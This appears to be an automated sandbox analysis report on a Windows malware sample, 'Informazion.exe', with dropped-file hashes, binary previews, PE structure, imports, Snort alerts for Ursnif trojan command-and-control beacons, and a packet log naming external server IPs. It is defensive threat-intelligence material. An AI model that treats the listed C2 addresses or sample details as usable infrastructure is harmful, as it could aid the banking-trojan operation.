Preview:	@...e...................t...n.c.....q.....I..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Download File

Process:	C:\Users\user\Desktop\Informazion.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	380008704
Entropy (8bit):	3.400186163202593E-4
Encrypted:	false
SSDEEP:	192:4w2ChcpVaLF/I0mfXXLuWhLsc9Y7ee9aD:4XChcpwLF/ITfXXLuELTrca
MD5:	B405B1565194722F9457002C4EDACBAE
SHA1:	3A3B6F5A05D8D2E95432ABEA5241F9FC5178A6FA
SHA-256:	C37FC8E08A4DEDAC07C4A058B243A6BBAB08239FD52B36DBE5DE9FB114DECC59
SHA-512:	BF7963AB33052EF586B9F3D0B201F34D7DDCE4B3D06F697F505B55A6CD2661E92EDC76A34113D83C3C61DB7EF12856BF5859353D6DD2F6864D8826934E0A1720
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..............6... ...@....@.. ....................................`..................................6..O....@..t....................`......t6............................................... ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`....... ..............@..B.................6......H........#...............5..............................................Z(.....(....s....(......(......0..V........s....(......o......o....o......s...... .M..o.........,..o......,..o......,..o..........(....&..5.......... ?..........6I.......0..z.........+l.r...p(.....(....r...po.....s .......+.......i].....a.o!......X......i2..o"......!&#......$@(#...($.......X....2..............QV........(....~.(%....(............s&...('.....s(...}.....(.....(.....(.....(........0..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnvs1j2f.0ik.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wavrmkab.sfm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	4.0036398439821355
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Informazion.exe
File size:	774656
MD5:	ef4c4f0b7a8cd7b8bd2d2dc6e5982043
SHA1:	2374d2dc1ca7f5ebed5386114562ee677eacdb42
SHA256:	6da6fa5a959ad50302b32db9fad3862abcbd0597402941d66935203300d52821
SHA512:	a9a45702a6d1018b0e685db5f827cd52a6b29e0f20313977c062929af5fb092cda906dc76b7f74fe24cd332921c4a50106bb263ec6f3b932799f2e8171b4fd4c
SSDEEP:	3072:oahKyd2n31U5OgWjtGqOh9j2o8zoSg0wK3BG+6s78cv+wUUBrvjCZPkM04Z9OZwi:oahO5LEJIS0wC/f8m+s/M0O9kxU
TLSH:	23F404C53344D553EC1B4A304E53C79A9769FCA1FA60309B33B4F76E4A3AAC22E29715
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

File Icon


Icon Hash:	b6baaebcbabbf82c

Static PE Info

General

Entrypoint:	0x140008200
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	4cea7ae85c87ddc7295d39ff9cda31d1

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F218D27B010h
dec eax
add esp, 28h
jmp 00007F218D27A8BBh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [000011CDh]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [00004922h], ebx
je 00007F218D27A8BCh
dec eax
cmp eax, ebx
jne 00007F218D27A8CCh
mov edi, 00000001h
mov eax, dword ptr [00004918h]
cmp eax, 01h
jne 00007F218D27A8C9h
lea ecx, dword ptr [eax+1Eh]
call 00007F218D27AEA3h
jmp 00007F218D27A92Ch
mov ecx, 000003E8h
call dword ptr [0000117Eh]
jmp 00007F218D27A879h
mov eax, dword ptr [000048F6h]
test eax, eax
jne 00007F218D27A90Bh
mov dword ptr [000048E8h], 00000001h
dec esp
lea esi, dword ptr [000013E9h]
dec eax
lea ebx, dword ptr [000013CAh]
dec eax
mov dword ptr [esp+30h], ebx
mov dword ptr [esp+24h], eax
dec ecx
cmp ebx, esi
jnc 00007F218D27A8D7h
test eax, eax
jne 00007F218D27A8D7h
dec eax
cmp dword ptr [ebx], 00000000h
je 00007F218D27A8C2h
dec eax
mov eax, dword ptr [ebx]
dec eax
mov ecx, dword ptr [00001388h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa23c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf000	0xb2090	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xe000	0x408	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0x20	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9a10	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9010	0x118	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9128	0x520	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7b80	0x7c00	False	0.5499936995967742	data	6.096261782871538	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x22c8	0x2400	False	0.4136284722222222	data	4.727841929207054	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x1f00	0x400	False	0.3212890625	data	3.1889769845125677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xe000	0x408	0x600	False	0.3932291666666667	data	3.1563665040475675	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xf000	0xb2090	0xb2200	False	0.20762061403508772	data	3.7870907515214767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0x20	0x200	False	0.083984375	data	0.4068473715812382	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xf878	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0x12694	0x4325	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x169bc	0x2868	Device independent bitmap graphic, 128 x 256 x 4, image size 0	English	United States
RT_ICON	0x19224	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	English	United States
RT_ICON	0x1988c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States
RT_ICON	0x19b74	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 0	English	United States
RT_ICON	0x19d5c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States
RT_ICON	0x19e84	0x825f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x220e4	0x4c28	Device independent bitmap graphic, 128 x 256 x 8, image size 0	English	United States
RT_ICON	0x26d0c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States
RT_ICON	0x27bb4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States
RT_ICON	0x2845c	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	English	United States
RT_ICON	0x28b24	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States
RT_ICON	0x2908c	0xa3d4	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x33460	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States
RT_ICON	0x43c88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States
RT_ICON	0x46230	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States
RT_ICON	0x472d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States
RT_ICON	0x47c60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States
RT_RCDATA	0x480c8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x480d0	0x78916	Microsoft Cabinet archive data, Windows 2000/XP setup, 493846 bytes, 1 file, at 0x2c +A "maintainabovl.exe", ID 1749, number 1, 11597 datablocks, 0x1503 compression	English	United States
RT_RCDATA	0xc09e8	0x4	data	English	United States
RT_RCDATA	0xc09ec	0x24	data	English	United States
RT_RCDATA	0xc0a10	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xc0a18	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xc0a20	0x4	data	English	United States
RT_RCDATA	0xc0a24	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xc0a2c	0x4	data	English	United States
RT_RCDATA	0xc0a30	0x12	data	English	United States
RT_RCDATA	0xc0a44	0x4	data	English	United States
RT_RCDATA	0xc0a48	0x8	data	English	United States
RT_RCDATA	0xc0a50	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xc0a58	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0xc0a60	0x102	data	English	United States
RT_VERSION	0xc0b64	0x34c	data	English	United States
RT_MANIFEST	0xc0eb0	0x1e0	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll	GetDeviceCaps
USER32.dll	ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll	?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll
Cabinet.dll
VERSION.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.462.173.149.20249696802033204 01/12/23-12:14:18.009455	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49696	80	192.168.2.4	62.173.149.202
192.168.2.462.173.149.20249696802033203 01/12/23-12:14:18.009455	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49696	80	192.168.2.4	62.173.149.202
192.168.2.431.41.44.15849697802033203 01/12/23-12:14:38.185535	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49697	80	192.168.2.4	31.41.44.158
192.168.2.431.41.44.15849697802033204 01/12/23-12:14:38.185535	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49697	80	192.168.2.4	31.41.44.158
192.168.2.4193.0.178.15749698802033203 01/12/23-12:14:58.327920	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49698	80	192.168.2.4	193.0.178.157

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2023 12:11:40.519716024 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:40.519793034 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:40.519895077 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:40.549042940 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:40.549086094 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:40.797775030 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:40.797890902 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:40.802975893 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:40.802997112 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:40.803360939 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:40.852799892 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.000236988 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.000278950 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.109684944 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.218667984 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.218744993 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.218806028 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.218872070 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.218938112 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.218976974 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.219013929 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.219013929 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.219037056 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.219043970 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.219080925 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.219105005 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.219125986 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.219140053 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.219142914 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.219163895 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.219216108 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.219238997 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.219293118 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.219315052 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.219337940 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.327989101 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328089952 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328107119 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328124046 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328377008 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.328433037 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328471899 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328500032 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328522921 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328584909 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328607082 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328634024 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328684092 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.328713894 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328738928 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.328738928 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.328861952 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328924894 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328948975 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.328974962 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.329010010 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.329034090 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.329058886 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.437839985 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.437927961 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438014984 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438193083 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.438227892 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438268900 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.438302040 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438337088 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438359976 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.438391924 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438424110 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.438441038 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438467026 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.438527107 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.438766003 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438826084 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438888073 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.438910007 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.438967943 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.439009905 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.439213991 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.439276934 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.439331055 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.439348936 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.439395905 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.439440012 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.439742088 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.439800024 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.439852953 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.439870119 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.439923048 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.439970016 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.440253019 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.440315008 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.440362930 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.440378904 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.440429926 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.440469027 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.549499035 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.549585104 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.549750090 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.549808025 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.549845934 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.549968958 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.550064087 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.550085068 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.550086021 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.550164938 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.550221920 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.550383091 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.550441027 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.550477982 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.550477982 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.550503016 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.550545931 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.550587893 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.550930977 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.550976038 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.551032066 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.551050901 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.551104069 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.551104069 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.551444054 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.551493883 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.551537037 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.551557064 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.551578999 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.551615000 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.551970005 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.552021027 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.552059889 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.552082062 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.552103996 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.552139044 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.552561045 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.552608013 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.552644968 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.552666903 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.552689075 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.552720070 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.553152084 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.553200960 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.553253889 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.553277969 CET	443	49695	174.142.60.54	192.168.2.4
